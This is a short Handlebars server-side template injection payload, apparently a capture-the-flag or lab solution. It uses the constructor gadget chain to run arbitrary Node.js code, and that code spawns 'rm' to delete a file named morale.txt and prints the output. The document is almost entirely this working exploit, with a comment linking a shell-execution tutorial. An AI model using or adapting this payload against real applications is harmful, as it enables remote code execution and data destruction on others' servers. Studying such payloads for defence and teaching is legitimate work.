// ALows u to debug the output of the commands
// Check out https://stackabuse.com/executing-shell-commands-with-node-js/
{{#with "s" as |string|}}
  {{#with "e"}}
    {{#with split as |conslist|}}
      {{this.pop}}
      {{this.push (lookup string.sub "constructor")}}
      {{this.pop}}
      {{#with string.split as |codelist|}}
        {{this.pop}}
        {{this.push "return  require('child_process').spawn('rm',['./morale.txt']).stdout.on('data', data => {
    console.log(`stdout: ${data}`);
});"}}
        {{this.pop}}
        {{#each conslist}}
          {{#with (string.sub.apply 0 codelist)}}
            {{this}}
          {{/with}}
        {{/each}}
      {{/with}}
    {{/with}}
  {{/with}}
{{/with}}